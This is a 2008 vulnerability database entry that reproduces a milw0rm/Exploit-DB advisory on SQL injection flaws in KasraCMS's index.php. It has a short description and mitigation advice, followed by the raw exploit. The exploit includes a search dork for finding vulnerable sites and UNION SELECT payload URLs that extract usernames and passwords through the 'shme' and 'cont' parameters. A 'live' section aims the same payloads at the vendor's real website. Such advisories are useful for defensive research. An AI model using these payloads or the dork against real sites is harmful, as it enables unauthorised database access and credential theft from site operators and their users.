KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities

vendor:

KasraCMS

by:

G4N0K

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: KasraCMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities

KasraCMS is vulnerable to multiple remote SQL injection vulnerabilities. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The attacker can exploit these vulnerabilities to gain access to sensitive information stored in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008


--[ DoRK ]--
intext:"2007-2008 Kasra ICT"


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--


--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-25]